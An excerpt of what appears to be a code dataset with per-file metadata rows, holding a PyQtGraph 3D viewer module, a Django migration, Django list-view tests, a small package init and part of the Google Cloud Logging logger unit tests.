try :
data = self.q_in.get(False)
if data is not None :
point = np.array([ [ data['pX'],data['pY'], data['pZ'] ] ])
self.lines = np.append(self.lines , point , axis=0)
self.trace.setData(pos=self.lines, color=pg.glColor((1, 1)), width=5, antialias=True)
except Exception :
pass
def run(self):
self.app = QApplication.instance()
if self.app is None:
self.app = QApplication([])
self.init_plot()
timer = QtCore.QTimer()
timer.timeout.connect(self.update)
timer.start(0)
self.q_mon.put(MODULE_NAME)
QApplication.exec_()
return
"""
#
# 3D Scattor Plot data
# - Can be used to check 3D space distributions
#
#
"""
class Scatter3DViewer(mp.Process):
def __init__(self, q_in, q_mon):
mp.Process.__init__(self)
self.config = get_config()[MODULE_NAME]
self.q_in = q_in
self.q_mon = q_mon
self.trace = {}
self.dots = np.array([ [0,0,0]])
def init_plot(self):
self.win = pg.GraphicsWindow(size=(800,600), title="Scatter 3D Viewer")
self.win.move(100, 800)
self.win.addLayout(row=1, col=1)
self.w = gl.GLViewWidget()
layoutgb = QtGui.QGridLayout()
self.win.setLayout(layoutgb)
layoutgb.addWidget(self.w,0,0)
self.w.opts['distance'] = 400
self.w.setWindowTitle('GL LinePlotItem')
self.w.setGeometry(0, 0, 2000, 2000)
self.w.show()
# create the background grids
gx = gl.GLGridItem()
gx.setSize(200,200,200)
gx.setColor((0, 255, 0, 80.0))
gx.rotate(90, 0, 1, 0)
self.w.addItem(gx)
gy = gl.GLGridItem()
gy.setSize(200,200,200)
gy.setColor((255, 0, 0, 80.0))
gy.rotate(90, 1, 0, 0)
self.w.addItem(gy)
gz = gl.GLGridItem()
gz.setSize(200,200,200)
gz.setColor((0, 0, 255, 160.0))
self.w.addItem(gz)
self.trace = gl.GLScatterPlotItem(pos=self.dots)
self.w.addItem(self.trace)
def update(self):
try :
data = self.q_in.get(False)
if data is not None:
dot = np.array([ [ data['mX'],data['mY'], data['mZ'] ] ])
self.dots = np.append(self.dots, dot, axis=0)
self.trace.setData(pos=self.dots, color=(255, 255,0,100), size=2)
except Exception:
pass
def run(self):
self.app = QApplication.instance()
if self.app is None:
self.app = QApplication([])
self.init_plot()
timer = QtCore.QTimer()
timer.timeout.connect(self.update)
timer.start(0)
self.q_mon.put(MODULE_NAME)
QApplication.exec_()
return
"""
# ================================================
#
# Orientation 3D viewer
# - can be used to check object orentations in
#
# ================================================
"""
class Orientation3DViewer(mp.Process):
def __init__(self, q_in, q_mon):
mp.Process.__init__(self)
self.config = get_config()[MODULE_NAME]
self.q_in = q_in
self.q_mon = q_mon
self.trace_x = {}
self.trace_y = {}
self.trace_z = {}
self.line_x = np.array([ [0,0,0] ])
self.line_y = np.array([ [0,0,0] ])
self.line_z = np.array([ [0,0,0] ])
def init_plot(self):
self.win = pg.GraphicsWindow(size=(800,600), title="Orientation 3D Viewer")
self.win.move(100, 800)
self.win.addLayout(row=1, col=1)
self.w = gl.GLViewWidget()
layoutgb = QtGui.QGridLayout()
self.win.setLayout(layoutgb)
layoutgb.addWidget(self.w,0,0)
self.w.opts['distance'] = 400
self.w.setWindowTitle('GL LinePlotItem')
self.w.setGeometry(0, 0, 2000, 2000)
self.w.show()
# create the background grids
gx = gl.GLGridItem()
gx.setSize(200,200,200)
gx.setColor((0, 255, 0, 80.0))
gx.rotate(90, 0, 1, 0)
self.w.addItem(gx)
gy = gl.GLGridItem()
gy.setSize(200,200,200)
gy.setColor((255, 0, 0, 80.0))
gy.rotate(90, 1, 0, 0)
self.w.addItem(gy)
gz = gl.GLGridItem()
gz.setSize(200,200,200)
gz.setColor((0, 0, 255, 160.0))
self.w.addItem(gz)
self.line_x = np.array([ [0,0,0], [40, 0, 0] ])
self.line_y = np.array([ [0,0,0], [0, 40, 0] ])
self.line_z = np.array([ [0,0,0], [0, 0, 40] ])
self.trace_x = gl.GLLinePlotItem(pos=self.line_x, color=pg.glColor((255, 0, 0, 160.0)), width=10, antialias=True)
self.w.addItem(self.trace_x)
self.trace_y = gl.GLLinePlotItem(pos=self.line_y, color=pg.glColor((0, 255, 0, 160.0)), width=10, antialias=True)
self.w.addItem(self.trace_y)
self.trace_z = gl.GLLinePlotItem(pos=self.line_z, color=pg.glColor((0, 0, 255, 160.0)), width=10, antialias=True)
self.w.addItem(self.trace_z)
def update(self):
try :
data = self.q_in.get(False)
if data is not None :
rot_quat = [data["qX"],data["qY"],data["qZ"],data["qW"]]
point_x = np.array([mh.rotate_vector(rot_quat, [1,0,0])]) * 40
point_y = np.array([mh.rotate_vector(rot_quat, [0,1,0])]) * 40
point_z = np.array([mh.rotate_vector(rot_quat, [0,0,1])]) * 40
self.line_x = np.array([ [0,0,0] ])
self.line_y = np.array([ [0,0,0] ])
self.line_z = np.array([ [0,0,0] ])
self.line_x = np.append(self.line_x , point_x , axis=0)
self.line_y = np.append(self.line_y , point_y , axis=0)
self.line_z = np.append(self.line_z , point_z , axis=0)
self.trace_x.setData(pos=self.line_x, color=((255, 0, 0, 160.0)), width=10, antialias=True)
self.trace_y.setData(pos=self.line_y, color=((0, 255, 0, 160.0)), width=10, antialias=True)
self.trace_z.setData(pos=self.line_z, color=((0, 0, 255, 160.0)), width=10, antialias=True)
except Exception as err:
#print (str(err))
pass
def run(self):
self.app = QApplication.instance()
if self.app is None:
self.app = QApplication([])
self.init_plot()
timer = QtCore.QTimer()
timer.timeout.connect(self.update)
timer.start(0)
self.q_mon.put(MODULE_NAME)
QApplication.exec_()
return
"""
# ================================================
#
# Vector 3D viewer
# - can be used to view 3D vector
#
# ================================================
"""
class Vector3DViewer(mp.Process):
def __init__(self, q_in, q_mon):
mp.Process.__init__(self)
self.config = get_config()[MODULE_NAME]
self.q_in = q_in
self.q_mon = q_mon
self.trace_x = {}
self.trace_dot = {}
self.line_x = np.array([ [0,0,0] ])
self.dots = np.array([ [0,0,0]])
def init_plot(self):
self.win = pg.GraphicsWindow(size=(800,600), title="Vector 3D Viewerr")
self.win.move(100, 800)
self.win.addLayout(row=1, col=1)
self.w = gl.GLViewWidget()
layoutgb = QtGui.QGridLayout()
self.win.setLayout(layoutgb)
layoutgb.addWidget(self.w,0,0)
self.w.opts['distance'] = 400
self.w.setWindowTitle('GL LinePlotItem')
self.w.setGeometry(0, 0, 2000, 2000)
self.w.show()
# create the background grids
gx = gl.GLGridItem()
gx.setSize(200,200,200)
gx.setColor((0, 255, 0, 80.0))
gx.rotate(90, 0, 1, 0)
self.w.addItem(gx)
gy = gl.GLGridItem()
gy.setSize(200,200,200)
gy.setColor((255, 0, 0, 80.0))
gy.rotate(90, 1, 0, 0)
self.w.addItem(gy)
gz = gl.GLGridItem()
gz.setSize(200,200,200)
gz.setColor((0, 0, 255, 160.0))
self.w.addItem(gz)
self.line_x = np.array([ [0,0,0], [40, 0, 0] ])
self.line_s = np.array([ [0,0,0], [40, 0, 0] ]) # reverse rotated vector
self.trace_x = gl.GLLinePlotItem(pos=self.line_x, color=pg.glColor((255, 0, 0, 160.0)), width=10, antialias=True)
self.trace_s = gl.GLLinePlotItem(pos=self.line_s, color=pg.glColor((0, 255, 0, 160.0)), width=10, antialias=True)
self.w.addItem(self.trace_x)
self.w.addItem(self.trace_s)
self.trace_dot = gl.GLScatterPlotItem(pos=self.dots)
self.w.addItem(self.trace_dot)
def update(self):
try :
data = self.q_in.get(False)
if data is not None :
rot_quat = [data["qX"],data["qY"],data["qZ"],data["qW"]]
#point_x = np.array([mh.rotate_vector(rot_quat, [ data["exp.aX"], data["exp.aY"],data["exp.aZ"] ], reverse = False )]) * 60
point_x = np.array( [ data["exp.aX"], data["exp.aY"],data["exp.aZ"] ] ) * 60
point_s = np.array([mh.rotate_vector(rot_quat, [ data["exp.aX"], data["exp.aY"],data["exp.aZ"] ], reverse = True )]) * 40
#point_x = np.array([ [ data["exp.aX"], data["exp.aY"],data["exp.aZ"] ] ] ) * 40
self.line_x = np.array([ [0,0,0] ])
self.line_x = np.append(self.line_x , point_x , axis=0)
self.trace_x.setData(pos=self.line_x, color=((255, 0, 0, 160.0)), width=10, antialias=True)
self.line_s = np.array([ [0,0,0] ])
self.line_s = np.append(self.line_s , point_s , axis=0)
self.trace_s.setData(pos=self.line_s, color=((0, 255, 0, 160.0)), width=10, antialias=True)
#dot = np.array([ [ data["exp.aX"], data["exp.aY"],data["exp.aZ"] ] ])
self.dots = np.append(self.dots, point_x, axis=0)
self.dots = np.append(self.dots, point_s, axis=0)
self.trace_dot.setData(pos=self.dots, color=(255, 0,0,100), size=2)
except Exception as err:
#print (str(err))
pass
def run(self):
self.app = QApplication.instance()
if self.app is None:
self.app = QApplication([])
self.init_plot()
timer = QtCore.QTimer()
timer.timeout.connect(self.update)
timer.start(0)
self.q_mon.put(MODULE_NAME)
QApplication.exec_()
return
"""
# ================================================
#
# Below are demo functions
#
# ================================================
"""
def MotionTracker_demo():
q_in = mp.Queue()
q_mon = mp.Queue()
data = {}
p = MotionTracker(q_in =q_in, q_mon=q_mon)
p.start()
for alpha in np.arange(- math.pi * 6, math.pi * 6 , math.pi / 60 ):
data["pX"] = math.sin(alpha) * 30
data["pY"] = math.cos(alpha) * 60
data["pZ"] = alpha * 5
q_in.put(data)
time.sleep(0.01)
def Orientation3DViewer_demo():
q_in = mp.Queue()
q_mon = mp.Queue()
data = {}
p = Orientation3DViewer(q_in =q_in, q_mon=q_mon)
p.start()
for v in np.arange (-1, 1 , 0.001 ):
data["qX"] = v
data["qY"] = - v
data["qZ"] = v*2
data["qW"] = v*3
q_in.put(data)
time.sleep(0.01)
def Vector3DViewer_demo():
q_in = mp.Queue()
q_mon = mp.Queue()
data = {}
p = Vector3DViewer(q_in =q_in, q_mon=q_mon)
p.start()
for v in np.arange (-1, 1 , 0.001 ):
data["qX"] = v
data["qY"] = - v
data["qZ"] = v*2
data["qW"] = v*3
q_in.put(data)
print (data)
time.sleep(0.01)
def Scatter3DViewer_demo():
q_in = mp.Queue()
q_mon = mp.Queue()
p = Scatter3DViewer(q_in =q_in, q_mon=q_mon)
p.start()
data = {}
A = 100
B = 60
C = 20
for alpha in np.arange(0, math.pi,math.pi / 30 ):
for beta in np.arange(0, math.pi * 2, math.pi / 30 ):
data["mX"] = A * math.sin(alpha) * math.cos(beta)
data["mY"] = B * math.sin(alpha) * math.sin(beta)
data["mZ"] = C * math.cos(alpha)
q_in.put(data)
time.sleep(0.01)
if __name__ == '__main__':
#MotionTracker_demo()
#Orientation3DViewer_demo()
#Scatter3DViewer_demo()
Vector3DViewer_demo()
"""
v = MotionTracker(q_in =q_in, q_mon=q_mon)
v.start()
dots = np.random.randint(-10,10,size=(1000,3))
for dot in dots:
q_in.put(dot)
time.sleep(0.5)
"""
pass
| 25.302804
| 134
| 0.578562
| 2,068
| 13,537
| 3.678917
| 0.102031
| 0.018139
| 0.007886
| 0.02011
| 0.821109
| 0.789432
| 0.758018
| 0.738959
| 0.724501
| 0.700447
| 0
| 0.067726
| 0.233213
| 13,537
| 534
| 135
| 25.350187
| 0.665222
| 0.04388
| 0
| 0.753754
| 0
| 0
| 0.023927
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.063063
| false
| 0.015015
| 0.03003
| 0.003003
| 0.12012
| 0.003003
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b1de6b693aefafd45e8891fe33bf072093a7422
| 1,364
|
py
|
Python
|
sizecompares/migrations/0001_initial.py
|
ProjectFFF/FFF
|
a563e2bb5aafe18d3fa3143d83b6558921eac8ee
|
[
"BSD-2-Clause"
] | 6
|
2020-09-02T18:48:28.000Z
|
2022-02-06T11:13:06.000Z
|
sizecompares/migrations/0001_initial.py
|
ProjectFFF/FFF
|
a563e2bb5aafe18d3fa3143d83b6558921eac8ee
|
[
"BSD-2-Clause"
] | 23
|
2020-09-04T08:57:28.000Z
|
2020-10-25T07:03:47.000Z
|
sizecompares/migrations/0001_initial.py
|
ProjectFFF/FFF
|
a563e2bb5aafe18d3fa3143d83b6558921eac8ee
|
[
"BSD-2-Clause"
] | null | null | null |
# Generated by Django 3.1.1 on 2020-10-03 18:06
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Compare',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('shoulder_compare', models.DecimalField(decimal_places=3, max_digits=6)),
('chest_compare', models.DecimalField(decimal_places=3, max_digits=6)),
('arm_compare', models.DecimalField(decimal_places=3, max_digits=6)),
('total_length_compare', models.DecimalField(decimal_places=3, max_digits=6)),
],
),
migrations.CreateModel(
name='Result',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('shoulder_result', models.DecimalField(decimal_places=3, max_digits=6)),
('chest_result', models.DecimalField(decimal_places=3, max_digits=6)),
('arm_result', models.DecimalField(decimal_places=3, max_digits=6)),
('total_length_result', models.DecimalField(decimal_places=3, max_digits=6)),
],
),
]
| 38.971429
| 114
| 0.607771
| 146
| 1,364
| 5.458904
| 0.321918
| 0.180678
| 0.250941
| 0.311167
| 0.752823
| 0.752823
| 0.752823
| 0.752823
| 0.752823
| 0.351317
| 0
| 0.030876
| 0.26393
| 1,364
| 34
| 115
| 40.117647
| 0.762948
| 0.032991
| 0
| 0.37037
| 1
| 0
| 0.104024
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.185185
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8632353fc904f9b802d28a8f193a99b313bb1ae4
| 5,897
|
py
|
Python
|
codedigger/lists/tests/test_views.py
|
prayutsu/Backend
|
944c37f0941fc6836a04c5bb85936558b9b30cff
|
[
"Apache-2.0"
] | null | null | null |
codedigger/lists/tests/test_views.py
|
prayutsu/Backend
|
944c37f0941fc6836a04c5bb85936558b9b30cff
|
[
"Apache-2.0"
] | null | null | null |
codedigger/lists/tests/test_views.py
|
prayutsu/Backend
|
944c37f0941fc6836a04c5bb85936558b9b30cff
|
[
"Apache-2.0"
] | null | null | null |
from .test_setup import TestSetUp
from user.models import User, Profile
from django.urls import reverse
from rest_framework.test import APIClient
from lists.models import Solved
from problem.models import Problem
class TestViews(TestSetUp):
#anon checking of list of all ladders and list endpoints
def test_check_topicwise_list_all_lists_view(self):
test_url = reverse('topicwise-list')
res = self.client.get(test_url)
self.assertEqual(res.status_code, 200)
def test_check_topicwise_ladder_all_ladders_view(self):
test_url = reverse('topicwise-ladder')
res = self.client.get(test_url)
self.assertEqual(res.status_code, 200)
def test_check_levelwise_list_all_lists_view(self):
test_url = reverse('levelwise-list')
res = self.client.get(test_url)
self.assertEqual(res.status_code, 200)
def test_check_levelwise_ladder_all_ladder_view(self):
test_url = reverse('levelwise-ladder')
res = self.client.get(test_url)
self.assertEqual(res.status_code, 200)
#checking lists with an authenticated user
def test_auth_check_topicwise_list_view(self):
test_url = reverse('topicwise-list') + "testinglist_topicwise"
here = User.objects.get(username="testing")
here.set_password(self.user_data['password'])
here.save()
res = self.client.post(self.login_url, self.user_data, format="json")
token = res.data['tokens']['access']
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)
res = client.get(test_url, format="json")
ok = True
for ele in res.data['result']:
if list(ele.values())[12]:
prob_id = list(ele.values())[2]
problem = Problem.objects.get(prob_id = prob_id)
if not Solved.objects.filter(user = here, problem = problem).exists():
ok = False
break
self.assertEqual(res.status_code, 200) and self.assertEqual(ok,True)
def test_auth_check_topicwise_ladder_view(self):
test_url = reverse('topicwise-ladder') + "testinglist_topicwise"
here = User.objects.get(username="testing")
here.set_password(self.user_data['password'])
here.save()
res = self.client.post(self.login_url, self.user_data, format="json")
token = res.data['tokens']['access']
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)
res = client.get(test_url, format="json")
ok = True
for ele in res.data['result']:
if list(ele.values())[12]:
prob_id = list(ele.values())[2]
problem = Problem.objects.get(prob_id = prob_id)
if not Solved.objects.filter(user = here, problem = problem).exists():
ok = False
break
self.assertEqual(res.status_code, 200) and self.assertEqual(ok,True)
def test_auth_check_levelwise_list_view(self):
test_url = reverse('levelwise-list') + "testinglist_levelwise"
here = User.objects.get(username="testing")
here.set_password(self.user_data['password'])
here.save()
res = self.client.post(self.login_url, self.user_data, format="json")
token = res.data['tokens']['access']
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)
res = client.get(test_url, format="json")
ok = True
for ele in res.data['result']:
if list(ele.values())[12]:
prob_id = list(ele.values())[2]
problem = Problem.objects.get(prob_id = prob_id)
if not Solved.objects.filter(user = here, problem = problem).exists():
ok = False
break
self.assertEqual(res.status_code, 200) and self.assertEqual(ok,True)
def test_auth_check_levelwise_ladder_view(self):
test_url = reverse('levelwise-ladder') + "testinglist_levelwise"
here = User.objects.get(username="testing")
here.set_password(self.user_data['password'])
here.save()
res = self.client.post(self.login_url, self.user_data, format="json")
token = res.data['tokens']['access']
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)
res = client.get(test_url, format="json")
ok = True
for ele in res.data['result']:
if list(ele.values())[12]:
prob_id = list(ele.values())[2]
problem = Problem.objects.get(prob_id = prob_id)
if not Solved.objects.filter(user = here, problem = problem).exists():
ok = False
break
self.assertEqual(res.status_code, 200) and self.assertEqual(ok,True)
def test_auth_check_userlists_view(self):
slug = "testinglist_levelwise"
test_url = reverse('userlist-edit',kwargs = {'slug' : slug})
here = User.objects.get(username="testing")
here.set_password(self.user_data['password'])
here.save()
res = self.client.post(self.login_url, self.user_data, format="json")
token = res.data['tokens']['access']
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)
res = client.get(test_url, format="json")
ok = True
for ele in res.data['result']:
if list(ele.values())[12]:
prob_id = list(ele.values())[2]
problem = Problem.objects.get(prob_id = prob_id)
if not Solved.objects.filter(user = here, problem = problem).exists():
ok = False
break
self.assertEqual(res.status_code, 200) and self.assertEqual(ok,True)
| 44.338346
| 86
| 0.617433
| 723
| 5,897
| 4.86722
| 0.121715
| 0.035806
| 0.034101
| 0.040921
| 0.880648
| 0.870986
| 0.867008
| 0.822677
| 0.780619
| 0.780619
| 0
| 0.009675
| 0.263863
| 5,897
| 132
| 87
| 44.674242
| 0.800968
| 0.016279
| 0
| 0.781513
| 0
| 0
| 0.083118
| 0.018107
| 0
| 0
| 0
| 0
| 0.07563
| 1
| 0.07563
| false
| 0.042017
| 0.05042
| 0
| 0.134454
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
868edf50e44b6743ed4812d790093efba756e9a1
| 192
|
py
|
Python
|
ctsb/models/time_series/__init__.py
|
paula-gradu/ctsb
|
fdc00acb798949ce1120778ad4725faf170f80c3
|
[
"Apache-2.0"
] | 1
|
2021-07-03T05:26:56.000Z
|
2021-07-03T05:26:56.000Z
|
ctsb/models/time_series/__init__.py
|
paula-gradu/ctsb
|
fdc00acb798949ce1120778ad4725faf170f80c3
|
[
"Apache-2.0"
] | null | null | null |
ctsb/models/time_series/__init__.py
|
paula-gradu/ctsb
|
fdc00acb798949ce1120778ad4725faf170f80c3
|
[
"Apache-2.0"
] | null | null | null |
# time_series init file
from ctsb.models.time_series.linear import Linear
from ctsb.models.time_series.last_value import LastValue
from ctsb.models.time_series.predict_zero import PredictZero
| 38.4
| 60
| 0.864583
| 30
| 192
| 5.333333
| 0.5
| 0.25
| 0.2625
| 0.3375
| 0.45
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 192
| 5
| 60
| 38.4
| 0.909091
| 0.109375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8693306332f79fad53f192ec2b4080ec975f9ffa
| 43,533
|
py
|
Python
|
tests/unit/test_logger.py
|
ysde/python-logging
|
3ac637a76f6ee6800947de2508ec2c3193413bf0
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_logger.py
|
ysde/python-logging
|
3ac637a76f6ee6800947de2508ec2c3193413bf0
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_logger.py
|
ysde/python-logging
|
3ac637a76f6ee6800947de2508ec2c3193413bf0
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from copy import deepcopy
from datetime import datetime
from datetime import timedelta
from datetime import timezone
import unittest
import mock
def _make_credentials():
import google.auth.credentials
return mock.Mock(spec=google.auth.credentials.Credentials)
class TestLogger(unittest.TestCase):
PROJECT = "test-project"
LOGGER_NAME = "logger-name"
TIME_FORMAT = '"%Y-%m-%dT%H:%M:%S.%f%z"'
@staticmethod
def _get_target_class():
from google.cloud.logging import Logger
return Logger
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_ctor_defaults(self):
conn = object()
client = _Client(self.PROJECT, conn)
logger = self._make_one(self.LOGGER_NAME, client=client)
self.assertEqual(logger.name, self.LOGGER_NAME)
self.assertIs(logger.client, client)
self.assertEqual(logger.project, self.PROJECT)
self.assertEqual(
logger.full_name, "projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME)
)
self.assertEqual(
logger.path, "/projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME)
)
self.assertIsNone(logger.labels)
def test_ctor_explicit(self):
LABELS = {"foo": "bar", "baz": "qux"}
conn = object()
client = _Client(self.PROJECT, conn)
logger = self._make_one(self.LOGGER_NAME, client=client, labels=LABELS)
self.assertEqual(logger.name, self.LOGGER_NAME)
self.assertIs(logger.client, client)
self.assertEqual(logger.project, self.PROJECT)
self.assertEqual(
logger.full_name, "projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME)
)
self.assertEqual(
logger.path, "/projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME)
)
self.assertEqual(logger.labels, LABELS)
def test_batch_w_bound_client(self):
from google.cloud.logging import Batch
conn = object()
client = _Client(self.PROJECT, conn)
logger = self._make_one(self.LOGGER_NAME, client=client)
batch = logger.batch()
self.assertIsInstance(batch, Batch)
self.assertIs(batch.logger, logger)
self.assertIs(batch.client, client)
def test_batch_w_alternate_client(self):
from google.cloud.logging import Batch
conn1 = object()
conn2 = object()
client1 = _Client(self.PROJECT, conn1)
client2 = _Client(self.PROJECT, conn2)
logger = self._make_one(self.LOGGER_NAME, client=client1)
batch = logger.batch(client=client2)
self.assertIsInstance(batch, Batch)
self.assertIs(batch.logger, logger)
self.assertIs(batch.client, client2)
def test_log_empty_defaults_w_default_labels(self):
DEFAULT_LABELS = {"foo": "spam"}
ENTRIES = [
{
"logName": "projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME),
"resource": {"type": "global", "labels": {}},
"labels": DEFAULT_LABELS,
}
]
client = _Client(self.PROJECT)
api = client.logging_api = _DummyLoggingAPI()
logger = self._make_one(self.LOGGER_NAME, client=client, labels=DEFAULT_LABELS)
logger.log_empty()
self.assertEqual(api._write_entries_called_with, (ENTRIES, None, None, None))
def test_log_empty_w_explicit(self):
import datetime
from google.cloud.logging import Resource
ALT_LOG_NAME = "projects/foo/logs/alt.log.name"
DEFAULT_LABELS = {"foo": "spam"}
LABELS = {"foo": "bar", "baz": "qux"}
IID = "IID"
SEVERITY = "CRITICAL"
METHOD = "POST"
URI = "https://api.example.com/endpoint"
STATUS = "500"
TRACE = "12345678-1234-5678-1234-567812345678"
SPANID = "000000000000004a"
REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
RESOURCE = Resource(
type="gae_app", labels={"module_id": "default", "version_id": "test"}
)
ENTRIES = [
{
"logName": ALT_LOG_NAME,
"labels": LABELS,
"insertId": IID,
"severity": SEVERITY,
"httpRequest": REQUEST,
"timestamp": "2016-12-31T00:01:02.999999Z",
"resource": RESOURCE._to_dict(),
"trace": TRACE,
"spanId": SPANID,
"traceSampled": True,
}
]
client1 = _Client(self.PROJECT)
client2 = _Client(self.PROJECT)
api = client2.logging_api = _DummyLoggingAPI()
logger = self._make_one(self.LOGGER_NAME, client=client1, labels=DEFAULT_LABELS)
logger.log_empty(
log_name=ALT_LOG_NAME,
client=client2,
labels=LABELS,
insert_id=IID,
severity=SEVERITY,
http_request=REQUEST,
timestamp=TIMESTAMP,
resource=RESOURCE,
trace=TRACE,
span_id=SPANID,
trace_sampled=True,
)
self.assertEqual(api._write_entries_called_with, (ENTRIES, None, None, None))
def test_log_text_defaults(self):
TEXT = "TEXT"
ENTRIES = [
{
"logName": "projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME),
"textPayload": TEXT,
"resource": {"type": "global", "labels": {}},
}
]
client = _Client(self.PROJECT)
api = client.logging_api = _DummyLoggingAPI()
logger = self._make_one(self.LOGGER_NAME, client=client)
logger.log_text(TEXT)
self.assertEqual(api._write_entries_called_with, (ENTRIES, None, None, None))
def test_log_text_w_unicode_and_default_labels(self):
TEXT = "TEXT"
DEFAULT_LABELS = {"foo": "spam"}
ENTRIES = [
{
"logName": "projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME),
"textPayload": TEXT,
"resource": {"type": "global", "labels": {}},
"labels": DEFAULT_LABELS,
}
]
client = _Client(self.PROJECT)
api = client.logging_api = _DummyLoggingAPI()
logger = self._make_one(self.LOGGER_NAME, client=client, labels=DEFAULT_LABELS)
logger.log_text(TEXT)
self.assertEqual(api._write_entries_called_with, (ENTRIES, None, None, None))
def test_log_text_explicit(self):
import datetime
from google.cloud.logging import Resource
ALT_LOG_NAME = "projects/foo/logs/alt.log.name"
TEXT = "TEXT"
DEFAULT_LABELS = {"foo": "spam"}
LABELS = {"foo": "bar", "baz": "qux"}
IID = "IID"
SEVERITY = "CRITICAL"
METHOD = "POST"
URI = "https://api.example.com/endpoint"
STATUS = "500"
TRACE = "12345678-1234-5678-1234-567812345678"
SPANID = "000000000000004a"
REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
RESOURCE = Resource(
type="gae_app", labels={"module_id": "default", "version_id": "test"}
)
ENTRIES = [
{
"logName": ALT_LOG_NAME,
"textPayload": TEXT,
"labels": LABELS,
"insertId": IID,
"severity": SEVERITY,
"httpRequest": REQUEST,
"timestamp": "2016-12-31T00:01:02.999999Z",
"resource": RESOURCE._to_dict(),
"trace": TRACE,
"spanId": SPANID,
"traceSampled": True,
}
]
client1 = _Client(self.PROJECT)
client2 = _Client(self.PROJECT)
api = client2.logging_api = _DummyLoggingAPI()
logger = self._make_one(self.LOGGER_NAME, client=client1, labels=DEFAULT_LABELS)
logger.log_text(
TEXT,
log_name=ALT_LOG_NAME,
client=client2,
labels=LABELS,
insert_id=IID,
severity=SEVERITY,
http_request=REQUEST,
timestamp=TIMESTAMP,
resource=RESOURCE,
trace=TRACE,
span_id=SPANID,
trace_sampled=True,
)
self.assertEqual(api._write_entries_called_with, (ENTRIES, None, None, None))
def test_log_struct_defaults(self):
STRUCT = {"message": "MESSAGE", "weather": "cloudy"}
ENTRIES = [
{
"logName": "projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME),
"jsonPayload": STRUCT,
"resource": {"type": "global", "labels": {}},
}
]
client = _Client(self.PROJECT)
api = client.logging_api = _DummyLoggingAPI()
logger = self._make_one(self.LOGGER_NAME, client=client)
logger.log_struct(STRUCT)
self.assertEqual(api._write_entries_called_with, (ENTRIES, None, None, None))
def test_log_struct_w_default_labels(self):
STRUCT = {"message": "MESSAGE", "weather": "cloudy"}
DEFAULT_LABELS = {"foo": "spam"}
ENTRIES = [
{
"logName": "projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME),
"jsonPayload": STRUCT,
"resource": {"type": "global", "labels": {}},
"labels": DEFAULT_LABELS,
}
]
client = _Client(self.PROJECT)
api = client.logging_api = _DummyLoggingAPI()
logger = self._make_one(self.LOGGER_NAME, client=client, labels=DEFAULT_LABELS)
logger.log_struct(STRUCT)
self.assertEqual(api._write_entries_called_with, (ENTRIES, None, None, None))
def test_log_struct_w_explicit(self):
import datetime
from google.cloud.logging import Resource
ALT_LOG_NAME = "projects/foo/logs/alt.log.name"
